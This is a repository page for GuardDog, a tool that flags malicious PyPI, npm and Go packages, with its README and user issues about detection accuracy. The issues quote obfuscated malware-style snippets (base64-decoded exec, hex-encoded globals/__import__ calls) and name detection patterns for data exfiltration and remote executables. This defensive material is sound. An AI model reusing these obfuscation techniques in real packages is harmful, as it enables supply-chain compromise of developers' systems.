datadog / guarddog

:snake: :mag: GuardDog is a CLI tool to Identify malicious PyPI and npm packages

Home Page: https://securitylabs.datadoghq.com/articles/guarddog-identify-malicious-pypi-packages/

License: Apache License 2.0


GuardDog

GuardDog is a CLI tool that identifies malicious PyPI and npm packages or Go modules. It runs a set of heuristics on the package source code (through Semgrep rules) and on the package metadata.

GuardDog can be used to scan local or remote PyPI and npm packages or Go modules using any of the available heuristics.


Getting started

Installation

pip install guarddog

Or use the Docker image:

docker pull ghcr.io/datadog/guarddog
alias guarddog='docker run --rm ghcr.io/datadog/guarddog'

Note: On Windows, the only supported installation method is Docker.

Sample usage

# Scan the most recent version of the 'requests' package
guarddog pypi scan requests

# Scan a specific version of the 'requests' package
guarddog pypi scan requests --version 2.28.1

# Scan the 'requests' package using 2 specific heuristics
guarddog pypi scan requests --rules exec-base64 --rules code-execution

# Scan the 'requests' package using all rules but one
guarddog pypi scan requests --exclude-rules exec-base64

# Scan a local package archive
guarddog pypi scan /tmp/triage.tar.gz

# Scan a local package directory
guarddog pypi scan /tmp/triage/

# Scan every package referenced in a requirements.txt file of a local folder
guarddog pypi verify workspace/guarddog/requirements.txt

# Scan every package referenced in a requirements.txt file and output a sarif file - works only for verify
guarddog pypi verify --output-format=sarif workspace/guarddog/requirements.txt

# Output JSON to standard output - works for every command
guarddog pypi scan requests --output-format=json

# All the commands also work on npm or go
guarddog npm scan express

# Run in debug mode
guarddog --log-level debug npm scan express
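
For scripting, the JSON output can be fed into a small post-processing step. The following is a minimal sketch, assuming the results map each heuristic name to a dict, list, string, or null value, as in the sample outputs quoted in the issues further down. The exact schema may differ between GuardDog versions, and count_findings is a hypothetical helper, not part of GuardDog.

```python
def count_findings(results: dict) -> dict:
    """Return {heuristic: number_of_findings} for heuristics with at least one finding."""
    counts = {}
    for rule, findings in results.items():
        if not findings:
            # Empty dict, empty list, empty string, or None: nothing reported.
            continue
        # A non-empty string is treated as a single finding (assumption).
        counts[rule] = 1 if isinstance(findings, str) else len(findings)
    return counts


# Sample shaped like the output quoted in one of the issues (assumed schema).
sample = {
    "shady-links": {},
    "exec-base64": {},
    "code-execution": {
        "LabelLib-2020.10.5/setup.py:21": "out = check_output(['cmake', '--version'])"
    },
    "typosquatting": [],
}
print(count_findings(sample))
```

A CI script could fail the build when the returned dict is non-empty.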

Heuristics

GuardDog comes with 2 types of heuristics, source code heuristics and metadata heuristics, listed below for each ecosystem:

PyPI

Source code heuristics:

Heuristic Description
shady-links Identify when a package contains a URL to a domain with a suspicious extension
obfuscation Identify when a package uses a common obfuscation method often used by malware
clipboard-access Identify when a package reads or writes data from the clipboard
exfiltrate-sensitive-data Identify when a package reads and exfiltrates sensitive data from the local system
download-executable Identify when a package downloads and makes executable a remote binary
exec-base64 Identify when a package dynamically executes base64-encoded code
silent-process-execution Identify when a package silently executes an executable
dll-hijacking Identifies when a malicious package manipulates a trusted application into loading a malicious DLL
bidirectional-characters Identify when a package contains bidirectional characters, which can be used to display source code differently than its actual execution. See more at https://trojansource.codes/
steganography Identify when a package retrieves hidden data from an image and executes it
code-execution Identify when an OS command is executed in the setup.py file
cmd-overwrite Identify when the 'install' command is overwritten in setup.py, indicating a piece of code automatically running when the package is installed
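
To illustrate what the bidirectional-characters heuristic looks for, here is a minimal sketch that scans text for the Unicode bidirectional control characters described in the Trojan Source research. GuardDog implements its source code heuristics as Semgrep rules, so this Python function (find_bidi_characters, a hypothetical name) only illustrates the idea and is not the tool's implementation.

```python
# Unicode bidirectional control characters discussed in the Trojan Source research.
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",  # LRE, RLE, PDF, LRO, RLO
    "\u2066", "\u2067", "\u2068", "\u2069",            # LRI, RLI, FSI, PDI
}


def find_bidi_characters(source: str) -> list[tuple[int, int, str]]:
    """Return (line, column, codepoint) for each bidirectional control character."""
    hits = []
    for line_no, line in enumerate(source.split("\n"), start=1):
        for col_no, char in enumerate(line, start=1):
            if char in BIDI_CONTROLS:
                hits.append((line_no, col_no, f"U+{ord(char):04X}"))
    return hits


print(find_bidi_characters('a = "\u202e"'))
```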

Metadata heuristics:

Heuristic Description
empty_information Identify packages with an empty description field
release_zero Identify packages with a release version that's 0.0 or 0.0.0
typosquatting Identify packages that are named closely to a highly popular package
potentially_compromised_email_domain Identify when a package maintainer e-mail domain (and therefore package manager account) might have been compromised
unclaimed_maintainer_email_domain Identify when a package maintainer e-mail domain (and therefore package manager account) is unclaimed and can be registered by an attacker
repository_integrity_mismatch Identify packages with a linked GitHub repository where the package has extra unexpected files
single_python_file Identify packages that have only a single Python file
bundled_binary Identify packages bundling binaries
deceptive_author This heuristic detects when an author is using a disposable email
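
One common way to decide that a name is "close" to a popular package is edit distance. The sketch below uses plain Levenshtein distance with a threshold of one edit. This is an illustrative assumption: GuardDog's actual typosquatting check may use a different metric, threshold, and popular-package list, and both function names are hypothetical.

```python
def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance computed with a rolling row."""
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        current = [i]
        for j, cb in enumerate(b, start=1):
            cost = 0 if ca == cb else 1
            current.append(min(
                previous[j] + 1,         # delete a character from a
                current[j - 1] + 1,      # insert a character into a
                previous[j - 1] + cost,  # substitute (or keep) a character
            ))
        previous = current
    return previous[-1]


def possible_typosquat(name: str, popular: list[str], max_distance: int = 1) -> list[str]:
    """Return popular names within max_distance edits of name, excluding exact matches."""
    return [p for p in popular if p != name and edit_distance(name, p) <= max_distance]


print(possible_typosquat("request", ["requests", "numpy"]))
```

Excluding exact matches matters: a package should never be reported as a typosquat of itself.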

npm

Source code heuristics:

Heuristic Description
npm-serialize-environment Identify when a package serializes 'process.env' to exfiltrate environment variables
npm-obfuscation Identify when a package uses a common obfuscation method often used by malware
npm-silent-process-execution Identify when a package silently executes an executable
shady-links Identify when a package contains a URL to a domain with a suspicious extension
npm-exec-base64 Identify when a package dynamically executes code through 'eval'
npm-install-script Identify when a package has a pre or post-install script automatically running commands
npm-steganography Identify when a package retrieves hidden data from an image and executes it
bidirectional-characters Identify when a package contains bidirectional characters, which can be used to display source code differently than its actual execution. See more at https://trojansource.codes/
npm-dll-hijacking Identifies when a malicious package manipulates a trusted application into loading a malicious DLL
npm-exfiltrate-sensitive-data Identify when a package reads and exfiltrates sensitive data from the local system

Metadata heuristics:

Heuristic Description
empty_information Identify packages with an empty description field
release_zero Identify packages with a release version that's 0.0 or 0.0.0
potentially_compromised_email_domain Identify when a package maintainer e-mail domain (and therefore package manager account) might have been compromised; note that NPM's API may not provide accurate information regarding the maintainer's email, so this detector may cause false positives for NPM packages. See https://www.theregister.com/2022/05/10/security_npm_email/
unclaimed_maintainer_email_domain Identify when a package maintainer e-mail domain (and therefore npm account) is unclaimed and can be registered by an attacker; note that NPM's API may not provide accurate information regarding the maintainer's email, so this detector may cause false positives for NPM packages. See https://www.theregister.com/2022/05/10/security_npm_email/
typosquatting Identify packages that are named closely to a highly popular package
direct_url_dependency Identify packages with direct URL dependencies. Dependencies fetched this way are not immutable and can be used to inject untrusted code or reduce the likelihood of a reproducible install.
npm_metadata_mismatch Identify packages which have mismatches between the npm package manifest and the package info for some critical fields
bundled_binary Identify packages bundling binaries
deceptive_author This heuristic detects when an author is using a disposable email
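
As an illustration of the direct_url_dependency idea, the sketch below flags dependencies in a package.json whose version specifier is a URL rather than a registry version range. The list of prefixes and the function name are assumptions made for this example; GuardDog's own detection logic may cover more or fewer cases (for instance, the "user/repo" GitHub shorthand is not handled here).

```python
import json

# Prefixes treated as "direct URL" specifiers in this sketch (an assumption).
URL_PREFIXES = ("http://", "https://", "git://", "git+", "github:")


def direct_url_dependencies(package_json: str) -> dict:
    """Return {dependency_name: specifier} for dependencies fetched from a URL."""
    manifest = json.loads(package_json)
    flagged = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in manifest.get(section, {}).items():
            if isinstance(spec, str) and spec.startswith(URL_PREFIXES):
                flagged[name] = spec
    return flagged


example = json.dumps({
    "dependencies": {
        "express": "^4.18.2",
        "evil": "https://example.com/evil.tgz",
    },
    "devDependencies": {"tool": "git+https://github.com/example/tool.git"},
})
print(direct_url_dependencies(example))
```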

go

Source code heuristics:

Heuristic Description
shady-links Identify when a package contains a URL to a domain with a suspicious extension

Custom Rules

GuardDog lets you implement custom source code rules. Source code rules live under the guarddog/analyzer/sourcecode directory, and the supported formats are Semgrep and Yara.

  • Semgrep rules are language-dependent, and GuardDog will import all .yml rules where the language matches the ecosystem selected by the user in the CLI.
  • Yara rules, on the other hand, are language-agnostic, so all matching .yar rules present will be imported.

You can therefore write your own rule and drop it into that directory. GuardDog will let you select or exclude it like any built-in rule, and will append its findings to the output.

For example, you can create the following semgrep rule:

rules:
  - id: sample-rule 
    languages:
      - python
    message: Output message when rule matches
    metadata:
      description: Description used in the CLI help
    patterns:
        YOUR RULE HEURISTICS GO HERE  
    severity: WARNING

Then you'll need to save it as sample-rule.yml. Note that the id must match the filename.

In the case of Yara, you can create the following rule:

rule sample-rule
{
  meta:
    description = "Description used in the output message"
    target_entity = "file"
  strings:
    $exec = "exec"
  condition:
    1 of them
}

Then you'll need to save it as sample-rule.yar.

Note that in both cases, the rule id must match the filename

Running GuardDog in a GitHub Action

The easiest way to integrate GuardDog in your CI pipeline is to leverage the SARIF output format, and upload it to GitHub's code scanning feature.

Using this, you get:

  • Automated comments to your pull requests based on the GuardDog scan output
  • Built-in false positive management directly in the GitHub UI

Sample GitHub Action using GuardDog:

name: GuardDog

on:
  push:
    branches:
      - main
  pull_request:
    branches:
      - main

permissions:
  contents: read

jobs:
  guarddog:
    permissions:
      contents: read # for actions/checkout to fetch code
      security-events: write # for github/codeql-action/upload-sarif to upload SARIF results
    name: Scan dependencies
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - name: Set up Python
        uses: actions/setup-python@v5
        with:
          python-version: "3.10"

      - name: Install GuardDog
        run: pip install guarddog

      - run: guarddog pypi verify requirements.txt --output-format sarif --exclude-rules repository_integrity_mismatch > guarddog.sarif

      - name: Upload SARIF file to GitHub
        uses: github/codeql-action/upload-sarif@v3
        with:
          category: guarddog-builtin
          sarif_file: guarddog.sarif
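
If you also want a quick summary of the SARIF file in the job log, it can be read with a few lines of Python. This sketch relies only on the standard SARIF 2.1.0 layout (runs, results, ruleId); which rule ids GuardDog emits and how it fills the other fields is not assumed here, and sarif_rule_counts is a hypothetical helper.

```python
import json
from collections import Counter


def sarif_rule_counts(sarif_text: str) -> Counter:
    """Count SARIF results per ruleId across all runs."""
    log = json.loads(sarif_text)
    counts = Counter()
    for run in log.get("runs", []):
        for result in run.get("results", []):
            counts[result.get("ruleId", "<unknown>")] += 1
    return counts


# Minimal hand-written SARIF document used only for illustration.
example_sarif = json.dumps({
    "version": "2.1.0",
    "runs": [{"results": [
        {"ruleId": "code-execution"},
        {"ruleId": "code-execution"},
        {"ruleId": "shady-links"},
    ]}],
})
print(sarif_rule_counts(example_sarif))
```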

Development

Running a local version of GuardDog

Using pip

  • Ensure Python >= 3.10 is installed
  • Clone the repository
  • Create a virtualenv: python3 -m venv venv && source venv/bin/activate
  • Install requirements: pip install -r requirements.txt
  • Run GuardDog using python -m guarddog

Using poetry

  • Ensure Poetry has an environment with Python >= 3.10: poetry env use 3.10.0
  • Install dependencies: poetry install
  • Run GuardDog: poetry run guarddog, or poetry shell and then guarddog

Unit tests

Running all unit tests: make test

Running unit tests against Semgrep rules: make test-semgrep-rules (tests are in tests/analyzer/sourcecode). These use the standard methodology for testing Semgrep rules.

Running unit tests against package metadata heuristics: make test-metadata-rules (tests are in tests/analyzer/metadata).

Benchmarking

You can run GuardDog on legitimate and malicious packages to determine false positives and false negatives. See ./tests/samples

Code quality checks

Run the type checker with

mypy --install-types --non-interactive guarddog

and the linter with

flake8 guarddog --count --select=E9,F63,F7,F82 --show-source --statistics --exclude tests/analyzer/sourcecode,tests/analyzer/metadata/resources,evaluator/data
flake8 guarddog --count --max-line-length=120 --statistics --exclude tests/analyzer/sourcecode,tests/analyzer/metadata/resources,evaluator/data --ignore=E203,W503


guarddog's People

Contributors

angellusmortis, cedricvanrompay-datadog, christophetd, claire-thib, d-niu, dependabot[bot], enelli, h4dr1en, ikretz, jamessteel123, juliendoutre, jxdv, materro, quinceyjames, romain-dd, sobregosodd, taiki-san, torxed, vdeturckheim, xopham, yzhan289, zmallen


guarddog's Issues

Upload to PyPi

It would be nice if the package was uploaded to PyPi so it does not need to be installed directly from Github.

  • guarddog @ git+https://github.com/DataDog/[email protected] is a much longer dep than just guarddog
  • Installing directly from github means a PyPi mirror cannot be used, meaning builds can be slowed down
  • Another malicious package may get uploaded to PyPi that pretends to be this one

list index out of range

On latest semgrep-rules branch:

$ python -m pysecurity -n ttyyyyyy -v 8.8.8
list index out of range

False positive to identify non-existing maintainer e-mails

Sample:

$ guarddog scan platformdirs
{'errors': {'compromised_email': 'Domain ronnypfannschmidt.de does not exist'},

$ whois  ronnypfannschmidt.de

refer:        whois.denic.de

domain:       DE

organisation: DENIC eG
address:      Kaiserstrasse 75-77
address:      Frankfurt am Main  60329
address:      Germany

status:       ACTIVE
remarks:      Registration information: http://www.denic.de/

created:      1986-11-05
changed:      2021-06-01
source:       IANA

False positive: Typosquatting

Hi there, first of all: awesome tools you guys made! 🎉
Second, I encountered the following output when scanning a requirements.txt file:

Found 2 potentially malicious indicators in ruamel-yaml version 0.17.21

typosquatting: This package closely ressembles the following package names, and might be a typosquatting attempt: ruamel-yaml, ruamel-yaml

code-execution: found 1 source code matches
  * setup.py file executing code at ruamel.yaml-0.17.21/setup.py:955
        subprocess.check_output(cmd)

I do get why the second indicator is found, but the first one confuses me:

The package name (also installed on my machine) is ruamel.yaml. There is no package named ruamel-yaml in either my requirements or on PyPi. Did something go wrong with the dots in the package name? Or is it because this package is listed in your typosquatting list as ruamel-yaml?

Thanks!
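
For context, PyPI treats project names as equivalent after normalization (PEP 503): runs of ".", "-" and "_" collapse to a single "-" and the result is lowercased, so ruamel.yaml and ruamel-yaml refer to the same project. The sketch below shows that normalization and a comparison that would avoid flagging a package as a typosquat of itself. Whether this is the actual cause of the report above is an assumption, and same_project is a hypothetical helper.

```python
import re


def normalize(name: str) -> str:
    """Normalize a project name as described in PEP 503."""
    return re.sub(r"[-_.]+", "-", name).lower()


def same_project(a: str, b: str) -> bool:
    """True when two spellings refer to the same PyPI project."""
    return normalize(a) == normalize(b)


print(normalize("ruamel.yaml"))
print(same_project("ruamel.yaml", "ruamel-yaml"))
```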

Potentially incorrect find with cmd-overwrite

I'm a bit confused why guarddog reports pip command override in this case where the reads are clearly happening in the long_description.
Package: pytest-cov version 4.0.0
Link to code: https://github.com/pytest-dev/pytest-cov/blob/master/setup.py#L88

cmd-overwrite: found 1 source code matches
  * Standard pip command overwritten in setup.py at pytest-cov-4.0.0/setup.py:88
        setup(
        name='pytest-cov',
        version='4.0.0',
        license='MIT',
        description='Pytest plugin for measuring coverage.',
        long_description='{}\n{}'.format(read('README.rst'), re.sub(':[a-z]+:`~?(.*?)`', r'``\1``', read('CHANGELOG.r...,
        },
    )

Heuristic: False negative on base64 decode

import base64;exec(''.join([y[0] for x in [x for x in base64.b64decode( ('TSUmPCwrKCEvLCQnLypNJ3AnL3IvLCQnLypEJC').encode('ascii') ).decode('ascii')] for y in [[x[0], x[1]] for x in {'\t': 'e', '\n': 'M', ' ': '!', '!': 'u', '@': ':', '~': ')', '`': '#', '#': '9', '$': 'J', '%': '`', '^': 'x', '&': 'b', '*': '2', '(': 'r', ')': ' ', '_': '[', '=': '.', '-': 'R', '+': 'K', '{': 'n', '}': '-', '|': 'm', '\\': 'C', '[': 'Z', ']': 'j', ':': '3', ';': 'z', '"': '~', "'": 'c', ',': 'g', '.': 'D', '/': 'L', '?': '1', '>': '7', '<': '|', '0': 'q', '1': 'G', '2': 'd', '3': 'X', '4': '"', '5': '\t', '6': 'N', '7': '_', '8': '6', '9': 'i', 'a': 'O', 'b': '^', 'c': '/', 'd': '$', 'e': "'", 'f': '0', 'g': 'V', 'h': 'T', 'i': '%', 'j': 'H', 'k': '=', 'l': 'l', 'm': '&', 'n': '?', 'o': ',', 'p': '<', 'q': 'a', 'u': 'F', 'r': '+', 's': '*', 't': '(', 'v': '@', 'w': 'o', 'x': 'p', 'y': 'A', 'z': '4', 'A': 'v', 'B': 'I', 'C': 'f', 'D': 'P', 'E': 'k', 'F': 's', 'G': '5', 'H': '8', 'I': 'U', 'J': ']', 'K': 'h', 'L': 'W', 'M': 'B', 'N': '>', 'O': 'E', 'P': '\\', 'Q': 'y', 'U': 'S', 'R': 't', 'S': '}', 'T': '{', 'V': 'Y', 'W': '\n', 'X': ';', 'Y': 'w', 'Z': 'Q'}.items()] if x == y[1]]))

Alert silencing features

Ignore specific false positives! General users often get alert fatigue. To avoid this and make the tool more user friendly, alert silencing should be implemented. However, don’t bake it into the command. This means don’t add more flags into a command, making it super long. Instead, find ways to bake it into the code being scanned. This means:

  • Allowing specific lines to be ignored in requirements.txt through semantic comments, like Semgrep
  • Allowing users to create a configuration file on their local machine that specifies a list of files that escape scanning (local scan mode)
  • For potential pip install command (i.e. pysecurity pip install ), devise a way to override the flags given by the command. For example, if cryptography is detected by pysecurity pip install, but we want to override the malicious flag, allow a way for the user to indicate, “I have reviewed cryptography, so please don’t error out or warn me”

Alias "pip install" to "guarddog"

Just a random idea I had:

As a: developer
I want to: automatically run pysecurity on every package I install
and that: the installation fails if the package is dangerous
so that: I don't install malicious packages

The idea would be to document a way to have an alias that runs pysecurity, then pip install, and fails if the package is deemed "risky".

Sample usage:

$ securepip install mypackage
Scanning mypackage with pysecurity...
No malicious behavior found, proceeding with pip install

Implementation: the easiest would be to provide a bash function one could add to their .bashrc
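
The issue proposes a bash function; the same control flow can be sketched in Python. This is only an illustration under several assumptions: that the JSON report carries an "issues" count (as in one of the outputs quoted in a later issue), that the current CLI syntax guarddog pypi scan <package> --output-format=json applies, and that scan_then_install, guarddog_scan and pip_install are hypothetical helpers. The scan and install steps are injectable so the logic can be tried without running either tool.

```python
import json
import subprocess
import sys


def guarddog_scan(package: str) -> dict:
    """Run GuardDog on a PyPI package and return the parsed JSON report."""
    completed = subprocess.run(
        ["guarddog", "pypi", "scan", package, "--output-format=json"],
        capture_output=True, text=True, check=False,  # exit-code semantics not assumed
    )
    return json.loads(completed.stdout)


def pip_install(package: str) -> None:
    """Install the package with the pip of the current interpreter."""
    subprocess.run([sys.executable, "-m", "pip", "install", package], check=True)


def scan_then_install(package: str, scan=guarddog_scan, install=pip_install) -> bool:
    """Install the package only if the scan reports no issues."""
    report = scan(package)
    # "issues" is an assumed key; a missing key is treated as zero findings.
    if report.get("issues", 0) > 0:
        print(f"Refusing to install {package}: scan reported findings")
        return False
    print("No malicious behavior found, proceeding with pip install")
    install(package)
    return True
```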

Heuristic to catch exec of base64 decoded strings

As discussed, we should probably have a heuristic that matches on:

exec(base64.b64decode("..."))

and more generally anything that looks like:

exec(anyfunction(anyotherfunction(base64.b64decode("..."))))

Sample package: botcity-documents
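
To make the intended matching concrete, here is a sketch using Python's ast module: it reports any exec or eval call whose arguments contain a b64decode call at any nesting depth. GuardDog expresses this as a Semgrep rule, so this is an illustration of the pattern rather than the project's rule, and exec_of_base64 is a hypothetical name.

```python
import ast


def _is_b64decode(node: ast.AST) -> bool:
    """True for calls such as base64.b64decode(...)."""
    return (
        isinstance(node, ast.Call)
        and isinstance(node.func, ast.Attribute)
        and node.func.attr == "b64decode"
    )


def exec_of_base64(source: str) -> list[int]:
    """Return line numbers of exec/eval calls fed, directly or not, by b64decode."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Name)
            and node.func.id in {"exec", "eval"}
        ):
            # Search every argument subtree for a nested b64decode call.
            if any(_is_b64decode(inner) for arg in node.args for inner in ast.walk(arg)):
                hits.append(node.lineno)
    return sorted(hits)


print(exec_of_base64('import base64\nexec(base64.b64decode("cHJpbnQoMSk="))'))
```

The source is only parsed, never executed, so it is safe to run this on untrusted code.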

Heuristic: Identify when globals() or __import__ are used with constant hex strings

Sample:

from builtins import *;OOO0O0OOOOO000oOo0oOoOo0,llIIlIlllllIlIlIlll,Oo000O0OO0oO0oO00oO0oO0O,WXWXXWWXXWXWXWWXXXWXXWX,XWWWWXXXXWWWWWXXWWX=(lambda SS2S222S22SS22S22S:SS2S222S22SS22S22S(__import__('\x7a\x6c\x69\x62'))),(lambda SS2S222S22SS22S22S:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']

Typosquatting false positive if package has period

If the package name has a period in the name, it generates a typosquatting error all the time.

Example using keyrings.google-artifactregistry-auth (Google made package for using Google Artifact Registry):

guarddog scan keyrings.google-artifactregistry-auth

[Issue/Question] Support against a requirements.txt file that contains specific version pins

Hi!

We are currently using pip-tools, which automatically pins every dependency against the version we specify in our requirements.in file. As such, whenever we run guarddog verify requirements.txt, it will result in a 404.

Is there any way to support this? I could write a script that does a bit of regex but would like some support from the maintainers if possible.

To reproduce.

  1. install pip-tools
  2. create a requirements.in, and add requests, guarddog, etc...
  3. run pip-compile

# requirements.txt
...
requests==2.28.1
    # via
    #   via -r requirements.in
...

  4. run guarddog verify requirements.txt
  5. Result in Received status code: 404 from PyPI
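
The "bit of regex" mentioned above could look like the following sketch, which pulls name and version out of name==version lines and ignores the comment lines that pip-compile adds. It is deliberately simple: extras such as requests[security]==2.28.1 and other specifier forms are not handled, and parse_pins is a hypothetical helper rather than GuardDog's parser.

```python
import re

# name==version at the start of a line; stops before whitespace, ";" or "#".
PIN = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)\s*==\s*([^\s;#]+)")


def parse_pins(requirements_text: str) -> list[tuple[str, str]]:
    """Return (name, version) pairs for every pinned requirement line."""
    pins = []
    for line in requirements_text.splitlines():
        match = PIN.match(line)
        if match:
            pins.append((match.group(1), match.group(2)))
    return pins


example_requirements = (
    "requests==2.28.1\n"
    "    # via\n"
    "    #   -r requirements.in\n"
    "urllib3==1.26.12 ; python_version >= '3.6'\n"
)
print(parse_pins(example_requirements))
```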

false negative when using os.popen

e.g. x-mroy-1052 is doing:


os.popen("cd %s && git init " % TEST_MODULES_ROOT)
        os.popen("cd %s && git remote add origin https://github.com/Qingluan/x-plugins.git"  % TEST_MODULES_ROOT)

        os.popen("chmod +x %s && cp %s /usr/local/bin/x-neid-server " % ("startup.bash", "startup.bash"))
        os.popen("cp %s %s" % ("supervisord.conf", SHOME))
        os.popen("cp %s %s" % ("server.crt", SHOME))
        os.popen("cp %s %s" % ("server.key", SHOME))
        os.popen("cp %s %s" % ("swordnode.ini", DB_PATH_C))

        os.popen("cp %s %s" % ("x-neid.conf", J(SHOME_SERVICES, "x-neid.conf")))
        os.popen("cp %s %s" % ("x-auth.conf", J(SHOME_SERVICES, "x-auth.conf")))
        os.popen("cp %s %s" % ("x-node-test.conf", J(SHOME_SERVICES, "x-node-test.conf")))

but it's not being caught by the current rule

False positives: exclude common commands from setup.py execution rule

Examples found in the wild:

{"shady-links": {}, "exfiltrate-sensitive-data": {}, "download-executable": {}, "exec-base64": {}, "code-execution": {"LabelLib-2020.10.5/setup.py:21": "            out = check_output(['cmake', '--version'])"}, "cmd-overwrite": {}, "typosquatting": []}

(I've seen the cmake case several times)

{"shady-links": {}, "exfiltrate-sensitive-data": {}, "download-executable": {}, "exec-base64": {}, "code-execution": {"redditanalysis-1.0.5/setup.py:16": "        os.system(\"pandoc --from=markdown --to=rst --output=README.rst README.md\")"}, "cmd-overwrite": {}, "typosquatting": []}

(pandoc as well)
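
One possible shape for such an exclusion is an allowlist keyed on the executable name. The sketch below is an assumption about how this could work, not GuardDog's behavior: the command set is taken from the examples in these issues, and string commands containing shell metacharacters are never allowlisted, since "pandoc x; curl ... | sh" would otherwise slip through.

```python
import shlex

# Build tools seen in the false-positive reports (illustrative, not exhaustive).
BENIGN_COMMANDS = {"cmake", "pandoc", "pkg-config"}
SHELL_METACHARACTERS = set(";|&$`<>")


def is_allowlisted(command) -> bool:
    """True when the command runs an allowlisted tool without shell chaining."""
    if isinstance(command, str):
        if SHELL_METACHARACTERS & set(command):
            return False  # chained or redirected commands are always reported
        argv = shlex.split(command)
    else:
        argv = list(command)
    return bool(argv) and argv[0] in BENIGN_COMMANDS


print(is_allowlisted(["cmake", "--version"]))
print(is_allowlisted("pandoc x; curl http://example.com | sh"))
```

Matching on the bare executable name is a trade-off: it silences the common cases above but would still need care for absolute paths or renamed binaries.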

Add missing methods to execute code

We have 2 rules where we match for code execution:

  • exec-base64.yml
  • code-execution.yml

These two rules should detect the same functions to detect code execution. Currently, code-execution only flags exec and subprocess.X

false positive when detecting domain extensions

Sample match (package kg-qa)

"Detected an unsafe link to url = 'https://lov.linkeddata.es/dataset/lov/api/v2/vocabulary/autocomplete?q=%s'%vocab.

It should not have matched, since the domain extension is .es and not .link, although it probably matches because of the lov.link... portion.
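
A way to avoid this class of false positive is to parse the URL and compare only the last label of the hostname, instead of searching for the extension anywhere in the string. The sketch below shows this with urllib.parse; the set of suspicious extensions is a placeholder for illustration (only .link comes from this issue), and has_suspicious_tld is a hypothetical helper.

```python
from urllib.parse import urlparse

# Placeholder list for illustration; only ".link" is taken from the issue above.
SUSPICIOUS_TLDS = {"link", "xyz", "tk"}


def has_suspicious_tld(url: str) -> bool:
    """True when the last label of the URL's hostname is in SUSPICIOUS_TLDS."""
    host = urlparse(url).hostname or ""
    tld = host.rsplit(".", 1)[-1].lower()
    return tld in SUSPICIOUS_TLDS


print(has_suspicious_tld(
    "https://lov.linkeddata.es/dataset/lov/api/v2/vocabulary/autocomplete?q=%s"
))
print(has_suspicious_tld("http://example.link/x"))
```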

False positive: running pkg-config

{"shady-links": {}, "exfiltrate-sensitive-data": {}, "download-executable": {}, "exec-base64": {}, "code-execution": {"pdfparser-rossum-1.5.3/setup.py:80": "            items = subprocess.check_output(['pkg-config', optional_args, pkg_option, package]).decode('utf8').split()"}, "cmd-overwrite": {}, "typosquatting": []}

Use Semgrep join and extract mode to make rules more robust

Join and Extract Mode Documentation

https://semgrep.dev/docs/experiments/join-mode/recursive-joins/
https://semgrep.dev/docs/experiments/extract-mode/

Ideas for Improvements

Join mode could allow us to create a collection of similar commands to reuse in all our rules, kind of like how CodeQL has an all encompassing user-input command. Extract mode could help us detect bash commands hidden in exec/eval/os.system/etc. commands instead of broadly detecting the calling function.

Note: For now, join mode doesn't seem to work with taint tracking: semgrep/semgrep#5062

Scanning a local package doesn't seem to work

guarddog scan Documents/pypi-malicious/20202-11-03-xolokvhcqvifyf-0.0.0.tar.gz
{'errors': {},
'issues': 0,
'results': {'cmd-overwrite': {},
'code-execution': {},
'download-executable': {},
'exec-base64': {},
'exfiltrate-sensitive-data': {},
'shady-links': {}}}

suggestion: don't match on "suspicious links" in comments?

e.g.

Scanning pip
{'secrets': {}, 'shady-links': {'/var/folders/_j/rxmxz87j51q5mzmk79qs0qs00000gp/T/tmp0lq4d1hz/pip-22.1.2/pip-22.1.2/src/pip/_internal/network/session.py': ['Detected an unsafe link to SECURE_ORIGINS: List[SecureOrigin] = [\n    # protocol, hostname, port\n    # Taken from Chrome\'s list of secure origins (See: http://bit.ly/1qrySKC)\n    ("https", "*", "*"),\n    ("*", "localhost", "*"),\n    ("*", "127.0.0.0/8", "*"),\n    ("*", "::1/128", "*"),\n    ("file", "*", None),\n    # ssh is always secure.\n    ("ssh", "*", "*"),\n].', 'Detected an unsafe link to [\n    # protocol, hostname, port\n    # Taken from Chrome\'s list of secure origins (See: http://bit.ly/1qrySKC)\n    ("https", "*", "*"),\n    ("*", "localhost", "*"),\n    ("*", "127.0.0.0/8", "*"),\n    ("*", "::1/128", "*"),\n    ("file", "*", None),\n    # ssh is always secure.\n    ("ssh", "*", "*"),\n].'], '/var/folders/_j/rxmxz87j51q5mzmk79qs0qs00000gp/T/tmp0lq4d1hz/pip-22.1.2/pip-22.1.2/src/pip/_vendor/tenacity/wait.py': ['Detected an unsafe link to """Random wait with exponentially widening window.\n\n    An exponential backoff strategy used to mediate contention between multiple\n    uncoordinated processes for a shared resource in distributed systems. This\n    is the sense in which "exponential backoff" is meant in e.g. 
Ethernet\n    networking, and corresponds to the "Full Jitter" algorithm described in\n    this blog post:\n\n    https://aws.amazon.com/blogs/architecture/exponential-backoff-and-jitter/\n\n    Each retry occurs at a random time in a geometrically expanding interval.\n    It allows for a custom multiplier and an ability to restrict the upper\n    limit of the random interval to some maximum value.\n\n    Example::\n\n        wait_random_exponential(multiplier=0.5,  # initial window 0.5s\n                                max=60)          # max 60s timeout\n\n    When waiting for an unavailable resource to become available again, as\n    opposed to trying to resolve contention for a shared resource, the\n    wait_exponential strategy (which uses a fixed interval) may be preferable.\n\n    """.']}, 'post-systeminfo': {}, 'download-executable': {}, 'base64-strings': {}, 'code-execution': {}, 'cmd-overwrite': {}, 'typosquatting': None}

Test metadata rules, analyzer, and CLI

Source code tests already exist in tests/analyzer/sourcecode. Tests for the metadata rules should exist in tests/analyzer/metadata. Tests should also exist for the analyzer, CLI tool, etc. (mirroring directory structure)

  • Metadata tests
  • Analyzer tests

Install issue when poetry is not installed

$ pip3 install git+https://github.com/DataDog/guarddog.git
...
ModuleNotFoundError: No module named 'poetry'

We may need to update the install docs? Also, it would be good that we don't require installing poetry to be able to use guarddog. But if we need, so be it

False positive

Scanning py-riff
{"secrets": {}, "shady-links": {}, "post-systeminfo": {}, "download-executable": {}, "exec-base64": {}, "code-execution": {"py-riff-1.7/setup.py": ["    version= subprocess.check_output(['git', 'describe', '--tags']).strip() \\"]}, "cmd-overwrite": {}, "typosquatting": null}

